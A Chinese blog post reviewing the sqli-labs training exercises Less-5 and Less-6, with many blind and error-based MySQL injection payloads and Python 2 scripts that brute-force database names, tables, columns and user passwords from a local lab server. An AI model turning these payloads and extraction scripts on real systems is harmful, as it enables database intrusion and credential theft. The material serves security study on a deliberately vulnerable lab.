Sqli-labs 复习 Less05-06 报错型sql盲注 - GET

之前学习了一遍 sqli-labs,这是巩固复习一遍,代码全部手敲,加深印象

Sqli-labs 博客目录

报错型 SQL 盲注

函数讲解

  1. 盲注用到的函数

     rand()  产生一个不固定的0~1的随机数列,加了参数之后会变成固定的伪随机数列
     rand(0),rand(1),当使用一个整数参数时,rand使用该参数作为种子生成一个固定的伪随机数列
     floor  向下取整	floor(2.5) == 2
     count()统计元组的个数
     concat  字符串连接
     extractvalue(最长32位)
     updateXml(最长32位)
    

    Less-5 使用脚本爆破注入

    Less-6 使用 floor(rand(x)*2) 报错注入

注入方法##

下面以 Less-6(基于报错的sql盲注-双引号)为例进行列举)

  1. 布尔型盲注手法,按位爆破

    1. left()
    2. ascii()、substr()
    3. regexp
    4. ord()、mid()

    ?id=1’and left((select version() limit 0,1),1)=‘s’#

  2. 利用 floor(rand(x)*2) 的执行bug进行报错注入

    ?id=1" union select 1,count(*),concat((你希望的查询语句),floor(rand(0)*2))a from information_schema.columns group by a#

    ?id=1" and (select 1 from(select count(*),concat((你希望的查询语句),floor(rand(0)*2))x from information_schema.tables group by x)a)#

  3. 利用 extractvalue() 函数报错注入(有长度限制,最长32位,mysql 5.0不可用,mysql 5.6可用)

    ?id=1" and extractvalue(1,concat(0x7e,(你希望的查询语句)))#

    ?id=1" and extractvalue(1,concat(0x7e,((select * from(select concat((你希望的查询语句))x from information_schema.tables group by x)a))))#

    ?id=1" and extractvalue(1,concat(0x7e,(database())))#

    ?id=1" and extractvalue(1,concat(0x7e,((select * from(select concat((select username from security.users limit 0,1))x from information_schema.tables group by x)a))))#

  4. 利用 updatexml() 函数报错注入(有长度限制,最长32位)

    ?id=1" and updatexml(1,concat(0x7e,(你希望的查询语句),0x7e),1)#

  5. 利用 name_const 数据的重复性(低版本可用,mysql 5.0可用,mysql 5.6不可用 )

    ?id=1" union select 1,2,3 from (select name_const((你希望的查询语句),1),name_const((你希望的查询语句),1))x #

    ?id=1" and exists(select * from (select * from(select name_const((你希望的查询语句),0))a join(select name_const((你希望的查询语句),0))b)c)#

  6. 利用 double 数值类型超出范围进行报错注入

    ?id=1" union select (exp(~(select * from(select user())a))),2,3#

    未测试成功

  7. 利用 bigint 溢出进行报错注入(这些溢出错误会导致MySQL版本5.5.5及以上)

    基于 bigint 溢出错误的SQL注入( https://www.cnblogs.com/lcamry/articles/5509112.html)

    未测试成功

    ?id=1" union select (!(select * from (select user())x) - ~0),2,3#

    下面为句式:

    !(select*from(select user())x)-~0

    (select(!x-~0)from(select(select user())x)a)

    (select!x-~0.from(select(select user())x)a)

    select ~0+!(select*from(select user())x)

  8. 一个句式组合:

    (select * from(select concat((你希望的查询语句))x from information_schema.tables group by x)a)

    遇到无法使用 select * from * 查询的时候,可以使用这个万能句式,代替下面的“你希望的查询语句”

     ?id=1" and (select 1 from(select count(*),concat((你希望的查询语句),floor(rand(0)*2))x from information_schema.tables group by x)a)#
     
     ?id=1" and extractvalue(1,concat(0x7e,(你希望的查询语句)))#
     
     ?id=1" and updatexml(1,concat(0x7e,(你希望的查询语句),0x7e),1)#
     
     ?id=1" and exists(select * from (select * from(select name_const((你希望的查询语句),0))a join(select name_const((你希望的查询语句),0))b)c)#
     		
     ?id=1" union select 1,2,3 from (select name_const((你希望的查询语句),1),name_const((你希望的查询语句),1))x #
     
     ?id=1" union select (exp(~(select * from(select user())a))),2,3#
     
     and so on...
    

Less-5 基于错误的sql盲注-单引号

  1. 测试

     ?id=1	正常
     ?id=1"	正常
     ?id=1'	报错
     下面使用布尔的 SQL 盲注
    
  2. 猜数据库的版本

     ?id=1'and left(version(),1)=4--+
     ?id=1'and left(version(),1)=5--+
     # 结果为 5.0.51a3ubuntu5
    

    脚本运行

     # -*- coding: utf-8 -*-
     # filename:Less05-1 database_version.py
    
     import hackhttp
     import re
     		
     def database_version(arg):
     	print "database_version start test..."
     	payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
     	version=""
     	for i in range(1,20):
     		for j in payloads:
     			hh = hackhttp.hackhttp()
     			msg = "1%27and%20mid(version(),{i},1)=%27{j}%27--+".format(i=i,j=j)
     			code, head, body, redirect_url, log = hh.http(arg+msg)            
     			count = re.findall("You are in",body)
     			if 'You are in' in count:
     				version+=j
     				print "第%s位是%s" % (i,j)
     				break
     	print "数据库的版本为: {version}".format(version=version)
     	
     if __name__ == '__main__':
     	database_version('http://10.10.10.137/sqli-labs/Less-5/?id=')
    
  3. 猜数据库的长度

     ?id=1'and length(database())=7--+
     ?id=1'and length(database())=8--+
     # 结果为 8
    

    脚本运行

     # -*- coding: utf-8 -*-
     # filename:Less05-2 database_length.py
    
     import hackhttp
     import re
     		
     def database_length(arg):
     	print "database_length start test..."
     	length=""
     	for j in range(1,20):
     		hh = hackhttp.hackhttp()
     		msg = "1%27and%20length(database())={j}--+".format(j=j)
     		code, head, body, redirect_url, log = hh.http(arg+msg)            
     		count = re.findall("You are in",body)
     		if 'You are in' in count:
     			length=j
     			break
     	print "数据库的长度为: {length}".format(length=length)
     	
     if __name__ == '__main__':
     	database_length('http://10.10.10.137/sqli-labs/Less-5/?id=')
    
  4. 猜数据库名

     ?id=1' and mid(database(),1,1)="a"--+
     ?id=1' and mid(database(),1,1)="b"--+
     # 结果为 security
    

    脚本运行

     # -*- coding: utf-8 -*-
     # filename:Less05-3 database_name.py
    
     import hackhttp
     import re
     		
     def database_name(arg):
     	print "database_name start test..."
     	payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
     	name=""
     	for i in range(1,20):
     		for j in payloads:
     			hh = hackhttp.hackhttp()
     			msg = "1%27and%20mid(database(),{i},1)=%27{j}%27--+".format(i=i,j=j)
     			code, head, body, redirect_url, log = hh.http(arg+msg)            
     			count = re.findall("You are in",body)
     			if 'You are in' in count:
     				name+=j
     				print "第%s位是%s" % (i,j)
     				break
     	print "数据库的版本为: {name}".format(name=name)
     	
     if __name__ == '__main__':
     	database_name('http://10.10.10.137/sqli-labs/Less-5/?id=')
    
  5. 猜表名

    ?id=1’and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=80–+

    ?id=1’and ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1),1,1))=81–+

    ?id=1’and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=80–+

    ?id=1’and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))=80–+

    结果为 emails, ussers

    运行脚本

     # -*- coding: utf-8 -*-
     # filename:Less05-4 table_name.py
    
     import hackhttp
     import re
     		
     def table_name(arg):
     	print "table_name start test..."
     	payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
     	table_name=""
     	database_name=""
     	for k in range(10):
     		for i in range(1,10):
     			for j in range(65,122):
     				hh = hackhttp.hackhttp()
     				msg = "1%27and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=0x7365637572697479%20limit%20{k},1),{i},1))={j}--+".format(k=k,i=i,j=j)
     				code, head, body, redirect_url, log = hh.http(arg+msg)            
     				count = re.findall("You are in",body)
     				if 'You are in' in count:
     					table_name+=chr(j)
     					#database_name+=str(k+1)
     					print "第%s个表的第%s位的ASCII码值是%s" % (k+1,i,j)
     					break
     		table_name+=" "
     	print "security 数据库的表名为: {table_name}".format(table_name=table_name)
     	
     if __name__ == '__main__':
     	table_name('http://10.10.10.137/sqli-labs/Less-5/?id=')
    
  6. 猜列名

    ?id=1’and 1=(select 1 from information_schema.columns where table_name=‘users’ and column_name regexp ‘^pass’ limit 0,1)–+

    ?id=1’and ascii(substr((select column_name from information_schema.columns where table_name=0x7573657273 limit 0,1),1,1))>65–+

    ?id=1’and ascii(substr((select column_name from information_schema.columns where table_name=0x7573657273 limit 1,1),1,1))>65–+

    结果为 id username password

    执行脚本

     # -*- coding: utf-8 -*-
     # filename:Less05-5 column_name.py
    
     import hackhttp
     import re
     		
     def column_name(arg):
     	print "column_name start test..."
     	payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
     	column_name=""
     	for k in range(10):
     		for i in range(1,15):
     			for j in range(65,122):
     				hh = hackhttp.hackhttp()
     				msg = "1%27and%20ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name=0x7573657273%20limit%20{k},1),{i},1))={j}--+".format(k=k,i=i,j=j)
     				code, head, body, redirect_url, log = hh.http(arg+msg)
     				count = re.findall("You are in",body)
     				if 'You are in' in count:
     					column_name+=chr(j)
     					print "第%s个列的第%s位的ASCII码值是%s" % (k+1,i,j)
     					break
     		column_name+=" "
     	print "security 数据库的 user 表的列名为: {column_name}".format(column_name=column_name)
     	
     if __name__ == '__main__':
     	column_name('http://10.10.10.137/sqli-labs/Less-5/?id=')
    
  7. 猜数据

    ?id=1’ and ord(mid((select ifnull(cast(username as char),0x20)from security.users order by id LIMIT 0,1),1,1))=68–+

    ?id=1’and ascii(substr((select username from security.users limit 0,1),1,1))=68–+

    执行脚本

     # -*- coding: utf-8 -*-
     # filename:Less05-5 data.py
    
     import hackhttp
     import re
     		
     def data(arg):
     	print "data start test..."
     	payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
     	username=""
     	password=""
     	for k in range(14):
     		for i in range(1,15):
     			for j in range(48,122):
     				hh = hackhttp.hackhttp()
     				username_msg = "1%27and%20ascii(substr((select%20username%20from%20security.users%20%20limit%20{k},1),{i},1))={j}--+".format(k=k,i=i,j=j)
     				password_msg = "1%27and%20ascii(substr((select%20password%20from%20security.users%20%20limit%20{k},1),{i},1))={j}--+".format(k=k,i=i,j=j)
     				code, head, body, redirect_url, log = hh.http(arg+username_msg)
     				code, head, body, redirect_url, log = hh.http(arg+password_msg)
     				username_count = re.findall("You are in",body)
     				password_count = re.findall("You are in",body)
     				if 'You are in' in username_count:
     					username+=chr(j)
     					print "username第%s个数据的第%s位的ASCII码值是%s" % (k+1,i,j)
     				if 'You are in' in password_count:
     					password+=chr(j)
     					print "password第%s个数据的第%s位的ASCII码值是%s" % (k+1,i,j)
     					break
    
     		username+=" "
     		password+=" "
     	print "security 数据库的 user 表的username为: {username}".format(username=username)
     	print "security 数据库的 user 表的password为: {password}".format(password=password)
     	
     if __name__ == '__main__':
     	data('http://10.10.10.137/sqli-labs/Less-5/?id=')
    

Less-6 基于错误的sql盲注-双引号

floor(rand(x)*2) - SQL报错型盲注教程(原理全剖析( https://blog.csdn.net/qq_35544379/article/details/77453019 ))

牛人推论:对于一个整数x,对于floor(rand(x)*2)产生的序列,如果在未出现“0011”或“1100”序列前出现“0010“或”1101”,那么该floor(rand(x)*2)产生的序列可用于报错型sql盲注

  1. 测试

     ?id=1	正常
     ?id=1'	正常
     ?id=1"	报错
    

    下面使用基于报错的 SQL 盲注

    公式:

    ?id=1’ union select 1,count(*),concat((你希望的查询语句),floor(rand(0)*2))a from information_schema.columns group by a–+

    例如:

    ?id=1" union select 1,count(*),concat(database(),floor(rand(0)*2))a from information_schema.tables group by a–+

    ?id=1" union select 1,count(*),concat(@@version,floor(rand(0)*2))a from information_schema.tables group by a–+

    ?id=1" union select 1,count(*),concat((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),floor(rand(0)*2))a from information_schema.tables group by a–+

    有的时候 union 联合查询无法使用,则可以使用 and

    ?id=1" and (select 1 from(select count(*),concat((你希望的查询语句),floor(rand(0)*2))x from information_schema.tables group by x)a)–+

  2. 猜数据库

    ?id=1" and (select 1 from(select count(*),concat(table_schema,floor(rand(0)*2))x from information_schema.tables group by x)a)–+

    ?id=1" union select 1,count(*),concat(database(),floor(rand(0)*2))a from information_schema.tables group by a–+

  3. 查表的个数

    ?id=1" and (select 1 from(select count(*),concat((select count(table_name) from information_schema.tables where table_schema=‘security’ limit 0,1),0x20,floor(rand(0)*2))x from information_schema.tables group by x)a)–+

    ?id=1" union select 1,count(*),concat((select count(table_name) from information_schema.tables where table_schema=‘security’ limit 0,1),0x20,floor(rand(0)*2))a from information_schema.columns group by a–+

  4. 查表名

    ?id=1" and (select 1 from(select count(*),concat((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)–+

    ?id=1" union select 1,count(*),concat((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),floor(rand(0)*2))a from information_schema.columns group by a–+

  5. 查列数

    ?id=1" and (select 1 from(select count(*),concat((select count(column_name) from information_schema.columns where table_name=‘users’ and table_schema=‘security’ limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)–+

    ?id=1" union select 1,count(*),concat((select count(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’ limit 0,1),floor(rand(0)*2))a from information_schema.columns group by a–+

  6. 列名

    ?id=1" union select 1,count(*),concat((select column_name from information_schema.columns where table_name=‘users’ and table_schema=‘security’ limit 0,1),floor(rand(0)*2))a from information_schema.columns group by a–+

    ?id=1" union Select 1,count(*),concat((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘users’ limit 0,1),floor(rand(0)*2))a from information_schema.columns group by a–+

  7. 查数据

    ?id=1" and (select 1 from(select count(*),concat((select concat(username,0x3a,0x20,password) from security. users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)–+

    ?id=1" union select 1,count(*),concat((select concat(username,0x3a,0x20,password) from security.users limit 0,1),floor(rand(0)*2))a from information_schema.tables group by a–+

你可能感兴趣的:(web安全)